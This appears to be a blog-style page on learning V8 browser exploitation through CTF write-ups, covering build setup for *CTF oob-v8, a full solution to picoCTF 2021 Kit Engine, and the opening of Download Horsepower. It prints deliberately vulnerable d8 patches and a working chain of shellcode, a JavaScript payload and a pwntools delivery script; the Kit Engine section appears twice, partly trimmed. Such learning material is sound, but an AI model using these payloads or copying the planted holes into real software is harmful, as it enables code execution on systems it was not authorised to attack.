1 of 5

Browser Exploitation

This is going to document my journey into V8 exploitation, and hopefully provide some tools to help you learn too.

To start with, we're going to go through *CTF's OOB-V8 challenge, mostly following Faith's brilliantly in-depth writeup. From there, well, we'll see.

Saelo's classic V8 paper is also a goldmine.

*CTF 2019 - oob-v8

Setting Up

Most of what is written from here is courtesy of and their . Please go check them out!

Ok so first off, we're gonna need an old VM. Why? It's an old challenge with an old version of v8. Back then, the v8 version compilation steps required the python command to point at python2 instead of python3 like on my ParrotOS VM, and there is the odd number of other steps. Long story short, there is a very real possibility for needing to jerry-rig a bunch of stuff, and I don't want to break a VM I actually use. Whoops.

So, we're gonna use a . You can get the ISO file directly from (amd64 version), and then set up a VM in VMware Workstation or your preferred virtualisation program.

Now we want to set up the system we're actually attacking. Instead of building v8 itself, we're going to build d8, the REPL (read–eval–print loop) for v8. It's essentially the command-line of v8, meaning we can compile less.

First off, install useful stuff.

Now let's grab the depot_tools, which is needed for building v8, then add it to our PATH:

Restart terminal for PATH to update. Then in folder of choice (I am in ~/Desktop/oob-v8), we fetch v8 and install all the dependencies needed to build it:

The next step is to checkout the commit that the challenge is based on, then sync the local files to that:

Now we want to apply the diff file we get given. The challenge archive can be found , and we'll extract it. The oob.diff file defines the changes made to the source code since the commit we checked out, which includes the vulnerability.

Now let's apply it then prepare and build the release version:

But there is small problem when it gets run:

Now we have Python 3.8 installed in /usr/bin/python3.8, we can try and overwrite the symlink /usr/bin/python3 to point here instead of the default 3.6.9 version that came with the ISO.

Now we hope and pray that rerunning the ninja command breaks nothing:

Then run it again:

And it starts working! The output release version is found in v8/out.gn/x64.release/d8. Now let's build debug.

And it's done. Epic!

I'm going to revert default Python to version 3.6 to minimise the possibility of something breaking.

Now we can move on to the challenge itself.

picoCTF 2021 - Kit Engine

A lesson in floating-point form

You will need an account for picoCTF to play this. The accounts are free, and there are hundreds of challenges for all categories - highly recommend it!

Analysis

We are given d8, source.tar.gz and server.py. Let's look at server.py first:

#!/usr/bin/env python3 

# With credit/inspiration to the v8 problem in downUnder CTF 2020

import os
import subprocess
import sys
import tempfile

def p(a):
    print(a, flush=True)

MAX_SIZE = 20000
input_size = int(input("Provide size. Must be < 5k:"))
if input_size >= MAX_SIZE:
    p(f"Received size of {input_size}, which is too big")
    sys.exit(-1)
p(f"Provide script please!!")
script_contents = sys.stdin.read(input_size)
p(script_contents)
# Don't buffer
with tempfile.NamedTemporaryFile(buffering=0) as f:
    f.write(script_contents.encode("utf-8"))
    p("File written. Running. Timeout is 20s")
    res = subprocess.run(["./d8", f.name], timeout=20, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    p("Run Complete")
    p(f"Stdout {res.stdout}")
    p(f"Stderr {res.stderr}")

It's very simple - you input the size of the file, and then you input the file itself. The file contents get written to a javascript file, then run under ./d8 with the output returned. Let's check the source code.

$ 7z x source.tar.gz
$ tar -xvf source.tar

The patch is as follows:

diff --git a/src/d8/d8.cc b/src/d8/d8.cc
index e6fb20d152..35195b9261 100644
--- a/src/d8/d8.cc
+++ b/src/d8/d8.cc
@@ -979,6 +979,53 @@ struct ModuleResolutionData {
 
 }  // namespace
 
+uint64_t doubleToUint64_t(double d){
+  union {
+    double d;
+    uint64_t u;
+  } conv = { .d = d };
+  return conv.u;
+}
+
+void Shell::Breakpoint(const v8::FunctionCallbackInfo<v8::Value>& args) {
+  __asm__("int3");
+}
+
+void Shell::AssembleEngine(const v8::FunctionCallbackInfo<v8::Value>& args) {
+  Isolate* isolate = args.GetIsolate();
+  if(args.Length() != 1) {
+    return;
+  }
+
+  double *func = (double *)mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+  if (func == (double *)-1) {
+    printf("Unable to allocate memory. Contact admin\n");
+    return;
+  }
+
+  if (args[0]->IsArray()) {
+    Local<Array> arr = args[0].As<Array>();
+
+    Local<Value> element;
+    for (uint32_t i = 0; i < arr->Length(); i++) {
+      if (arr->Get(isolate->GetCurrentContext(), i).ToLocal(&element) && element->IsNumber()) {
+        Local<Number> val = element.As<Number>();
+        func[i] = val->Value();
+      }
+    }
+
+    printf("Memory Dump. Watch your endianness!!:\n");
+    for (uint32_t i = 0; i < arr->Length(); i++) {
+      printf("%d: float %f hex %lx\n", i, func[i], doubleToUint64_t(func[i]));
+    }
+
+    printf("Starting your engine!!\n");
+    void (*foo)() = (void(*)())func;
+    foo();
+  }
+  printf("Done\n");
+}
+
 void Shell::ModuleResolutionSuccessCallback(
     const FunctionCallbackInfo<Value>& info) {
   std::unique_ptr<ModuleResolutionData> module_resolution_data(
@@ -2201,40 +2248,15 @@ Local<String> Shell::Stringify(Isolate* isolate, Local<Value> value) {
 
 Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
   Local<ObjectTemplate> global_template = ObjectTemplate::New(isolate);
-  global_template->Set(Symbol::GetToStringTag(isolate),
-                       String::NewFromUtf8Literal(isolate, "global"));
+  // Add challenge builtin, and remove some unintented solutions
+  global_template->Set(isolate, "AssembleEngine", FunctionTemplate::New(isolate, AssembleEngine));
+  global_template->Set(isolate, "Breakpoint", FunctionTemplate::New(isolate, Breakpoint));
   global_template->Set(isolate, "version",
                        FunctionTemplate::New(isolate, Version));
-
   global_template->Set(isolate, "print", FunctionTemplate::New(isolate, Print));
-  global_template->Set(isolate, "printErr",
-                       FunctionTemplate::New(isolate, PrintErr));
-  global_template->Set(isolate, "write", FunctionTemplate::New(isolate, Write));
-  global_template->Set(isolate, "read", FunctionTemplate::New(isolate, Read));
-  global_template->Set(isolate, "readbuffer",
-                       FunctionTemplate::New(isolate, ReadBuffer));
-  global_template->Set(isolate, "readline",
-                       FunctionTemplate::New(isolate, ReadLine));
-  global_template->Set(isolate, "load", FunctionTemplate::New(isolate, Load));
-  global_template->Set(isolate, "setTimeout",
-                       FunctionTemplate::New(isolate, SetTimeout));
-  // Some Emscripten-generated code tries to call 'quit', which in turn would
-  // call C's exit(). This would lead to memory leaks, because there is no way
-  // we can terminate cleanly then, so we need a way to hide 'quit'.
   if (!options.omit_quit) {
     global_template->Set(isolate, "quit", FunctionTemplate::New(isolate, Quit));
   }
-  global_template->Set(isolate, "testRunner",
-                       Shell::CreateTestRunnerTemplate(isolate));
-  global_template->Set(isolate, "Realm", Shell::CreateRealmTemplate(isolate));
-  global_template->Set(isolate, "performance",
-                       Shell::CreatePerformanceTemplate(isolate));
-  global_template->Set(isolate, "Worker", Shell::CreateWorkerTemplate(isolate));
-  // Prevent fuzzers from creating side effects.
-  if (!i::FLAG_fuzzing) {
-    global_template->Set(isolate, "os", Shell::CreateOSTemplate(isolate));
-  }
-  global_template->Set(isolate, "d8", Shell::CreateD8Template(isolate));
 
 #ifdef V8_FUZZILLI
   global_template->Set(
@@ -2243,11 +2265,6 @@ Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
       FunctionTemplate::New(isolate, Fuzzilli), PropertyAttribute::DontEnum);
 #endif  // V8_FUZZILLI
 
-  if (i::FLAG_expose_async_hooks) {
-    global_template->Set(isolate, "async_hooks",
-                         Shell::CreateAsyncHookTemplate(isolate));
-  }
-
   return global_template;
 }
 
@@ -2449,10 +2466,10 @@ void Shell::Initialize(Isolate* isolate, D8Console* console,
             v8::Isolate::kMessageLog);
   }
 
-  isolate->SetHostImportModuleDynamicallyCallback(
+  /*isolate->SetHostImportModuleDynamicallyCallback(
       Shell::HostImportModuleDynamically);
   isolate->SetHostInitializeImportMetaObjectCallback(
-      Shell::HostInitializeImportMetaObject);
+      Shell::HostInitializeImportMetaObject);*/
 
 #ifdef V8_FUZZILLI
   // Let the parent process (Fuzzilli) know we are ready.
diff --git a/src/d8/d8.h b/src/d8/d8.h
index a6a1037cff..4591d27f65 100644
--- a/src/d8/d8.h
+++ b/src/d8/d8.h
@@ -413,6 +413,9 @@ class Shell : public i::AllStatic {
     kNoProcessMessageQueue = false
   };
 
+  static void AssembleEngine(const v8::FunctionCallbackInfo<v8::Value>& args);
+  static void Breakpoint(const v8::FunctionCallbackInfo<v8::Value>& args);
+
   static bool ExecuteString(Isolate* isolate, Local<String> source,
                             Local<Value> name, PrintResult print_result,
                             ReportExceptions report_exceptions,

This just just generally quite strange. The only particularly relevant part is the new AssembleEngine() function:

void Shell::AssembleEngine(const v8::FunctionCallbackInfo<v8::Value>& args) {
    Isolate* isolate = args.GetIsolate();
    if(args.Length() != 1) {
        return;
    }
    
    double *func = (double *)mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (func == (double *)-1) {
        printf("Unable to allocate memory. Contact admin\n");
        return;
    }
    
    if (args[0]->IsArray()) {
        Local<Array> arr = args[0].As<Array>();
    
        Local<Value> element;
        for (uint32_t i = 0; i < arr->Length(); i++) {
            if (arr->Get(isolate->GetCurrentContext(), i).ToLocal(&element) && element->IsNumber()) {
                Local<Number> val = element.As<Number>();
                func[i] = val->Value();
            }
        }
    
        printf("Memory Dump. Watch your endianness!!:\n");
        for (uint32_t i = 0; i < arr->Length(); i++) {
            printf("%d: float %f hex %lx\n", i, func[i], doubleToUint64_t(func[i]));
        }
        
        printf("Starting your engine!!\n");
        void (*foo)() = (void(*)())func;
        foo();
    }
    printf("Done\n");
}

This is a pretty strange function to have, but the process is simple. FIrst there are a couple of checks, and if they are not passed, they fail:

Check if the number of arguments is 1
Assign 4096 bytes of memory with RWX permissions

Then, if the first argument is an array, we cast it to one and store it in arr. We then loop through arr, and for every index i, we store the result in the local variable element. If it's a number, it gets written to func at a set offset. Essentially, it copies the entirety of arr to func! With some added checks to make sure the types are correct.

There is then a memory dump of func, just to simplify things.

And then finally execution is continued from func, like a classic shellcoding challenge!

Exploitation

This isn't really much of a V8-specific challenge - the data we are input is run as shellcode, and the output is returned to us.

HOWEVER

val->Value() actually returns a floating-point value (a double), not an integer. Maybe you could get this from the source code, but you could also get it from the mmap() line:

double *func = (double *)mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

You can see it's all double values. This means we have to inject shellcode, but in their floating-point form rather than as integers.

If you've read the oob-v8 writeup, you know there are common functions for converting the integers you want to be written to memory to the floating-point form that would write them (and if you haven't, check it out).

function itof(val) { // typeof(val) = BigInt
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}

So now we just need to get valid shellcode, convert it into 64-bit integers and find the float equivalent. Once we make the array, we simply call AssembleEngine() on it and it executes it for us. Easy peasy!

We can't actually interact with the process, only get stdout and stderr, so we'll have to go to a direct read of flag.txt. We can use pwntools to generate the shellcode for this:

from pwn import *

context.os = 'linux'
context.arch = 'amd64'

shellcode = asm(shellcraft.cat('flag.txt'))

We want to convert shellcode to bytes, then to 64-bit integers so we can transform them to floats. Additionally, the 64-bit integers have to have the bytes in reverse order for endiannes! We'll let python do all of that for us:

from pwn import *

# set all the context
context.os = 'linux'
context.arch = 'amd64'

# create the shellcode
shellcode = asm(shellcraft.cat('flag.txt'))
print(shellcode)
# pad it to a multiple of 8 with NOP instructions
# this means the converstion to 8-byte values is smoother
shellcode += b'\x90' * 4

# get the hex codes for every byte and store them as a string in the list
shellcode = [hex(c)[2:].rjust(2, '0') for c in shellcode]
# get the shellcode bytes in packs of 8, in reverse order for endianness, with 0x at the front
eight_bytes = ['0x' + ''.join(shellcode[i:i+8][::-1]) for i in range(0, len(shellcode), 8)]
print(eight_bytes)

We can dump this (after minor cleanup) into exploit.js and convert the entire list to floats before calling AssembleEngine(). Make sure you put the n after every 64-bit value, to signify to the javascript that it's a BigInt type!

var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);

function itof(val) { // typeof(val) = BigInt
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}

// needs to have the `n` to be a BigInt value!
payload = [0x66b848240cfe016an, 0x507478742e67616cn, 0xf631e7894858026an, 0x7fffffffba41050fn, 0x016a58286ac68948n, 0x90909090050f995fn]
payload_float = []

for (let i = 0; i < payload.length; i++) {
    payload_float.push(itof(payload[i]))
}

AssembleEngine(payload_float)

And finally we can deliver it with a python script using pwntools, and parse the input to get the important bit:

from pwn import *

with open("exploit.js", "rb") as f:
    exploit = f.read()

p = remote('mercury.picoctf.net', 48700)
p.sendlineafter(b'5k:', str(len(exploit)).encode())
p.sendlineafter(b'please!!\n', exploit)

p.recvuntil(b"Stdout b'")
flag = p.recvuntil(b"\\")[:-1]
print(flag.decode())

And we get the flag:

picoCTF{vr00m_vr00m_48f07b402a4020e0}

picoCTF 2021 - Kit Engine

A lesson in floating-point form

You will need an account for picoCTF to play this. The accounts are free, and there are hundreds of challenges for all categories - highly recommend it!

Analysis

We are given d8, source.tar.gz and server.py. Let's look at server.py first:

#!/usr/bin/env python3 

# With credit/inspiration to the v8 problem in downUnder CTF 2020

import os
import subprocess
import sys
import tempfile

def p(a):
    print(a, flush=True)

MAX_SIZE = 20000
input_size = int(input("Provide size. Must be < 5k:"))
if input_size >= MAX_SIZE:
    p(f"Received size of {input_size}, which is too big")
    sys.exit(-1)
p(f"Provide script please!!")
script_contents = sys.stdin.read(input_size)
p(script_contents)
# Don't buffer
with tempfile.NamedTemporaryFile(buffering=0) as f:
    f.write(script_contents.encode("utf-8"))
    p("File written. Running. Timeout is 20s")
    res = subprocess.run(["./d8", f.name], timeout=20, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    p("Run Complete")
    p(f"Stdout {res.stdout}")
    p(f"Stderr {res.stderr}")

$ 7z x source.tar.gz
$ tar -xvf source.tar

The patch is as follows:

diff --git a/src/d8/d8.cc b/src/d8/d8.cc
index e6fb20d152..35195b9261 100644
--- a/src/d8/d8.cc
+++ b/src/d8/d8.cc
@@ -979,6 +979,53 @@ struct ModuleResolutionData {
 
 }  // namespace
 
+uint64_t doubleToUint64_t(double d){
+  union {
+    double d;
+    uint64_t u;
+  } conv = { .d = d };
+  return conv.u;
+}
+
+void Shell::Breakpoint(const v8::FunctionCallbackInfo<v8::Value>& args) {
+  __asm__("int3");
+}
+
+void Shell::AssembleEngine(const v8::FunctionCallbackInfo<v8::Value>& args) {
+  Isolate* isolate = args.GetIsolate();
+  if(args.Length() != 1) {
+    return;
+  }
+
+  double *func = (double *)mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+  if (func == (double *)-1) {
+    printf("Unable to allocate memory. Contact admin\n");
+    return;
+  }
+
+  if (args[0]->IsArray()) {
+    Local<Array> arr = args[0].As<Array>();
+
+    Local<Value> element;
+    for (uint32_t i = 0; i < arr->Length(); i++) {
+      if (arr->Get(isolate->GetCurrentContext(), i).ToLocal(&element) && element->IsNumber()) {
+        Local<Number> val = element.As<Number>();
+        func[i] = val->Value();
+      }
+    }
+
+    printf("Memory Dump. Watch your endianness!!:\n");
+    for (uint32_t i = 0; i < arr->Length(); i++) {
+      printf("%d: float %f hex %lx\n", i, func[i], doubleToUint64_t(func[i]));
+    }
+
+    printf("Starting your engine!!\n");
+    void (*foo)() = (void(*)())func;
+    foo();
+  }
+  printf("Done\n");
+}
+
 void Shell::ModuleResolutionSuccessCallback(
     const FunctionCallbackInfo<Value>& info) {
   std::unique_ptr<ModuleResolutionData> module_resolution_data(
@@ -2201,40 +2248,15 @@ Local<String> Shell::Stringify(Isolate* isolate, Local<Value> value) {
 
 Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
   Local<ObjectTemplate> global_template = ObjectTemplate::New(isolate);
-  global_template->Set(Symbol::GetToStringTag(isolate),
-                       String::NewFromUtf8Literal(isolate, "global"));
+  // Add challenge builtin, and remove some unintented solutions
+  global_template->Set(isolate, "AssembleEngine", FunctionTemplate::New(isolate, AssembleEngine));
+  global_template->Set(isolate, "Breakpoint", FunctionTemplate::New(isolate, Breakpoint));
   global_template->Set(isolate, "version",
                        FunctionTemplate::New(isolate, Version));
-
   global_template->Set(isolate, "print", FunctionTemplate::New(isolate, Print));
-  global_template->Set(isolate, "printErr",
-                       FunctionTemplate::New(isolate, PrintErr));
-  global_template->Set(isolate, "write", FunctionTemplate::New(isolate, Write));
-  global_template->Set(isolate, "read", FunctionTemplate::New(isolate, Read));
-  global_template->Set(isolate, "readbuffer",
-                       FunctionTemplate::New(isolate, ReadBuffer));
-  global_template->Set(isolate, "readline",
-                       FunctionTemplate::New(isolate, ReadLine));
-  global_template->Set(isolate, "load", FunctionTemplate::New(isolate, Load));
-  global_template->Set(isolate, "setTimeout",
-                       FunctionTemplate::New(isolate, SetTimeout));
-  // Some Emscripten-generated code tries to call 'quit', which in turn would
-  // call C's exit(). This would lead to memory leaks, because there is no way
-  // we can terminate cleanly then, so we need a way to hide 'quit'.
   if (!options.omit_quit) {
     global_template->Set(isolate, "quit", FunctionTemplate::New(isolate, Quit));
   }
-  global_template->Set(isolate, "testRunner",
-                       Shell::CreateTestRunnerTemplate(isolate));
-  global_template->Set(isolate, "Realm", Shell::CreateRealmTemplate(isolate));
-  global_template->Set(isolate, "performance",
-                       Shell::CreatePerformanceTemplate(isolate));
-  global_template->Set(isolate, "Worker", Shell::CreateWorkerTemplate(isolate));
-  // Prevent fuzzers from creating side effects.
-  if (!i::FLAG_fuzzing) {
-    global_template->Set(isolate, "os", Shell::CreateOSTemplate(isolate));
-  }
-  global_template->Set(isolate, "d8", Shell::CreateD8Template(isolate));
 
 #ifdef V8_FUZZILLI
   global_template->Set(
@@ -2243,11 +2265,6 @@ Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
       FunctionTemplate::New(isolate, Fuzzilli), PropertyAttribute::DontEnum);
 #endif  // V8_FUZZILLI
 
-  if (i::FLAG_expose_async_hooks) {
-    global_template->Set(isolate, "async_hooks",
-                         Shell::CreateAsyncHookTemplate(isolate));
-  }
-
   return global_template;
 }
 
@@ -2449,10 +2466,10 @@ void Shell::Initialize(Isolate* isolate, D8Console* console,
             v8::Isolate::kMessageLog);
   }
 
-  isolate->SetHostImportModuleDynamicallyCallback(
+  /*isolate->SetHostImportModuleDynamicallyCallback(
       Shell::HostImportModuleDynamically);
   isolate->SetHostInitializeImportMetaObjectCallback(
-      Shell::HostInitializeImportMetaObject);
+      Shell::HostInitializeImportMetaObject);*/
 
 #ifdef V8_FUZZILLI
   // Let the parent process (Fuzzilli) know we are ready.
diff --git a/src/d8/d8.h b/src/d8/d8.h
index a6a1037cff..4591d27f65 100644
--- a/src/d8/d8.h
+++ b/src/d8/d8.h
@@ -413,6 +413,9 @@ class Shell : public i::AllStatic {
     kNoProcessMessageQueue = false
   };
 
+  static void AssembleEngine(const v8::FunctionCallbackInfo<v8::Value>& args);
+  static void Breakpoint(const v8::FunctionCallbackInfo<v8::Value>& args);
+
   static bool ExecuteString(Isolate* isolate, Local<String> source,
                             Local<Value> name, PrintResult print_result,
                             ReportExceptions report_exceptions,

This just just generally quite strange. The only particularly relevant part is the new AssembleEngine() function:

void Shell::AssembleEngine(const v8::FunctionCallbackInfo<v8::Value>& args) {
    Isolate* isolate = args.GetIsolate();
    if(args.Length() != 1) {
        return;
    }
    
    double *func = (double *)mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (func == (double *)-1) {
        printf("Unable to allocate memory. Contact admin\n");
        return;
    }
    
    if (args[0]->IsArray()) {
        Local<Array> arr = args[0].As<Array>();
    
        Local<Value> element;
        for (uint32_t i = 0; i < arr->Length(); i++) {
            if (arr->Get(isolate->GetCurrentContext(), i).ToLocal(&element) && element->IsNumber()) {
                Local<Number> val = element.As<Number>();
                func[i] = val->Value();
            }
        }
    
        printf("Memory Dump. Watch your endianness!!:\n");
        for (uint32_t i = 0; i < arr->Length(); i++) {
            printf("%d: float %f hex %lx\n", i, func[i], doubleToUint64_t(func[i]));
        }
        
        printf("Starting your engine!!\n");
        void (*foo)() = (void(*)())func;
        foo();
    }
    printf("Done\n");
}

This is a pretty strange function to have, but the process is simple. FIrst there are a couple of checks, and if they are not passed, they fail:

Check if the number of arguments is 1
Assign 4096 bytes of memory with RWX permissions

There is then a memory dump of func, just to simplify things.

And then finally execution is continued from func, like a classic shellcoding challenge!

Exploitation

This isn't really much of a V8-specific challenge - the data we are input is run as shellcode, and the output is returned to us.

HOWEVER

val->Value() actually returns a floating-point value (a double), not an integer. Maybe you could get this from the source code, but you could also get it from the mmap() line:

double *func = (double *)mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

You can see it's all double values. This means we have to inject shellcode, but in their floating-point form rather than as integers.

function itof(val) { // typeof(val) = BigInt
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}

We can't actually interact with the process, only get stdout and stderr, so we'll have to go to a direct read of flag.txt. We can use pwntools to generate the shellcode for this:

from pwn import *

context.os = 'linux'
context.arch = 'amd64'

shellcode = asm(shellcraft.cat('flag.txt'))

from pwn import *

# set all the context
context.os = 'linux'
context.arch = 'amd64'

# create the shellcode
shellcode = asm(shellcraft.cat('flag.txt'))
print(shellcode)
# pad it to a multiple of 8 with NOP instructions
# this means the converstion to 8-byte values is smoother
shellcode += b'\x90' * 4

# get the hex codes for every byte and store them as a string in the list
shellcode = [hex(c)[2:].rjust(2, '0') for c in shellcode]
# get the shellcode bytes in packs of 8, in reverse order for endianness, with 0x at the front
eight_bytes = ['0x' + ''.join(shellcode[i:i+8][::-1]) for i in range(0, len(shellcode), 8)]
print(eight_bytes)

var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);

function itof(val) { // typeof(val) = BigInt
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}

// needs to have the `n` to be a BigInt value!
payload = [0x66b848240cfe016an, 0x507478742e67616cn, 0xf631e7894858026an, 0x7fffffffba41050fn, 0x016a58286ac68948n, 0x90909090050f995fn]
payload_float = []

for (let i = 0; i < payload.length; i++) {
    payload_float.push(itof(payload[i]))
}

AssembleEngine(payload_float)

And finally we can deliver it with a python script using pwntools, and parse the input to get the important bit:

from pwn import *

with open("exploit.js", "rb") as f:
    exploit = f.read()

p = remote('mercury.picoctf.net', 48700)
p.sendlineafter(b'5k:', str(len(exploit)).encode())
p.sendlineafter(b'please!!\n', exploit)

p.recvuntil(b"Stdout b'")
flag = p.recvuntil(b"\\")[:-1]
print(flag.decode())

And we get the flag:

picoCTF{vr00m_vr00m_48f07b402a4020e0}

picoCTF 2021 - Download Horsepower

Another OOB, but with pointer compression

Analysis

server.py is the same as in Kit Engine - send it a JS file, it gets run.

Let's check the patch again:

diff --git a/BUILD.gn b/BUILD.gn
index 9482b977e3..6a3f1e2d0f 100644
--- a/BUILD.gn
+++ b/BUILD.gn
@@ -1175,6 +1175,7 @@ action("postmortem-metadata") {
 }
 
 torque_files = [
+  "src/builtins/array-horsepower.tq",
   "src/builtins/aggregate-error.tq",
   "src/builtins/array-at.tq",
   "src/builtins/array-copywithin.tq",
diff --git a/src/builtins/array-horsepower.tq b/src/builtins/array-horsepower.tq
new file mode 100644
index 0000000000..7ea53ca306
--- /dev/null
+++ b/src/builtins/array-horsepower.tq
@@ -0,0 +1,17 @@
+// Gotta go fast!!
+
+namespace array {
+
+transitioning javascript builtin
+ArraySetHorsepower(
+  js-implicit context: NativeContext, receiver: JSAny)(horsepower: JSAny): JSAny {
+    try {
+      const h: Smi = Cast<Smi>(horsepower) otherwise End;
+      const a: JSArray = Cast<JSArray>(receiver) otherwise End;
+      a.SetLength(h);
+    } label End {
+        Print("Improper attempt to set horsepower");
+    }
+    return receiver;
+}
+}
\ No newline at end of file
diff --git a/src/d8/d8.cc b/src/d8/d8.cc
index e6fb20d152..abfb553864 100644
--- a/src/d8/d8.cc
+++ b/src/d8/d8.cc
@@ -999,6 +999,10 @@ void Shell::ModuleResolutionSuccessCallback(
   resolver->Resolve(realm, module_namespace).ToChecked();
 }
 
+void Shell::Breakpoint(const v8::FunctionCallbackInfo<v8::Value>& args) {
+  __asm__("int3");
+}
+
 void Shell::ModuleResolutionFailureCallback(
     const FunctionCallbackInfo<Value>& info) {
   std::unique_ptr<ModuleResolutionData> module_resolution_data(
@@ -2201,40 +2205,14 @@ Local<String> Shell::Stringify(Isolate* isolate, Local<Value> value) {
 
 Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
   Local<ObjectTemplate> global_template = ObjectTemplate::New(isolate);
-  global_template->Set(Symbol::GetToStringTag(isolate),
-                       String::NewFromUtf8Literal(isolate, "global"));
+  // Remove some unintented solutions
+  global_template->Set(isolate, "Breakpoint", FunctionTemplate::New(isolate, Breakpoint));
   global_template->Set(isolate, "version",
                        FunctionTemplate::New(isolate, Version));
-
   global_template->Set(isolate, "print", FunctionTemplate::New(isolate, Print));
-  global_template->Set(isolate, "printErr",
-                       FunctionTemplate::New(isolate, PrintErr));
-  global_template->Set(isolate, "write", FunctionTemplate::New(isolate, Write));
-  global_template->Set(isolate, "read", FunctionTemplate::New(isolate, Read));
-  global_template->Set(isolate, "readbuffer",
-                       FunctionTemplate::New(isolate, ReadBuffer));
-  global_template->Set(isolate, "readline",
-                       FunctionTemplate::New(isolate, ReadLine));
-  global_template->Set(isolate, "load", FunctionTemplate::New(isolate, Load));
-  global_template->Set(isolate, "setTimeout",
-                       FunctionTemplate::New(isolate, SetTimeout));
-  // Some Emscripten-generated code tries to call 'quit', which in turn would
-  // call C's exit(). This would lead to memory leaks, because there is no way
-  // we can terminate cleanly then, so we need a way to hide 'quit'.
   if (!options.omit_quit) {
     global_template->Set(isolate, "quit", FunctionTemplate::New(isolate, Quit));
   }
-  global_template->Set(isolate, "testRunner",
-                       Shell::CreateTestRunnerTemplate(isolate));
-  global_template->Set(isolate, "Realm", Shell::CreateRealmTemplate(isolate));
-  global_template->Set(isolate, "performance",
-                       Shell::CreatePerformanceTemplate(isolate));
-  global_template->Set(isolate, "Worker", Shell::CreateWorkerTemplate(isolate));
-  // Prevent fuzzers from creating side effects.
-  if (!i::FLAG_fuzzing) {
-    global_template->Set(isolate, "os", Shell::CreateOSTemplate(isolate));
-  }
-  global_template->Set(isolate, "d8", Shell::CreateD8Template(isolate));
 
 #ifdef V8_FUZZILLI
   global_template->Set(
@@ -2243,11 +2221,6 @@ Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
       FunctionTemplate::New(isolate, Fuzzilli), PropertyAttribute::DontEnum);
 #endif  // V8_FUZZILLI
 
-  if (i::FLAG_expose_async_hooks) {
-    global_template->Set(isolate, "async_hooks",
-                         Shell::CreateAsyncHookTemplate(isolate));
-  }
-
   return global_template;
 }
 
@@ -2449,10 +2422,10 @@ void Shell::Initialize(Isolate* isolate, D8Console* console,
             v8::Isolate::kMessageLog);
   }
 
-  isolate->SetHostImportModuleDynamicallyCallback(
+  /*isolate->SetHostImportModuleDynamicallyCallback(
       Shell::HostImportModuleDynamically);
   isolate->SetHostInitializeImportMetaObjectCallback(
-      Shell::HostInitializeImportMetaObject);
+      Shell::HostInitializeImportMetaObject);*/
 
 #ifdef V8_FUZZILLI
   // Let the parent process (Fuzzilli) know we are ready.
diff --git a/src/d8/d8.h b/src/d8/d8.h
index a6a1037cff..7cf66d285a 100644
--- a/src/d8/d8.h
+++ b/src/d8/d8.h
@@ -413,6 +413,8 @@ class Shell : public i::AllStatic {
     kNoProcessMessageQueue = false
   };
 
+  static void Breakpoint(const v8::FunctionCallbackInfo<v8::Value>& args);
+
   static bool ExecuteString(Isolate* isolate, Local<String> source,
                             Local<Value> name, PrintResult print_result,
                             ReportExceptions report_exceptions,
diff --git a/src/init/bootstrapper.cc b/src/init/bootstrapper.cc
index ce3886e87e..6621a79618 100644
--- a/src/init/bootstrapper.cc
+++ b/src/init/bootstrapper.cc
@@ -1754,6 +1754,8 @@ void Genesis::InitializeGlobal(Handle<JSGlobalObject> global_object,
     JSObject::AddProperty(isolate_, proto, factory->constructor_string(),
                           array_function, DONT_ENUM);
 
+    SimpleInstallFunction(isolate_, proto, "setHorsepower",
+                          Builtins::kArraySetHorsepower, 1, false);
     SimpleInstallFunction(isolate_, proto, "concat", Builtins::kArrayConcat, 1,
                           false);
     SimpleInstallFunction(isolate_, proto, "copyWithin",
diff --git a/src/objects/js-array.tq b/src/objects/js-array.tq
index b18f5bafac..b466b330cd 100644
--- a/src/objects/js-array.tq
+++ b/src/objects/js-array.tq
@@ -28,6 +28,9 @@ extern class JSArray extends JSObject {
   macro IsEmpty(): bool {
     return this.length == 0;
   }
+  macro SetLength(l: Smi) {
+    this.length = l;
+  }
   length: Number;
 }

The only really relevant code is here:

ArraySetHorsepower(js-implicit context: NativeContext, receiver: JSAny)(horsepower: JSAny): JSAny {
    try {
        const h: Smi = Cast<Smi>(horsepower) otherwise End;
        const a: JSArray = Cast<JSArray>(receiver) otherwise End;
        a.SetLength(h);
    } label End {
        Print("Improper attempt to set horsepower");
    }
    return receiver;
}

macro SetLength(l: Smi) {
    this.length = l;
}

SimpleInstallFunction(isolate_, proto, "setHorsepower",
    Builtins::kArraySetHorsepower, 1, false);

We can essentially set the length of an array by using .setHorsepower(). By setting it to a larger value, we can get an OOB read and write, from which point it would be very similar to the oob-v8 writeup.

Understanding the Memory Layout

Let's first try and check the OOB works as we expected. We're gonna create an exploit.js with the classic ftoi() and itof() functions:

var buf = new ArrayBuffer(8);
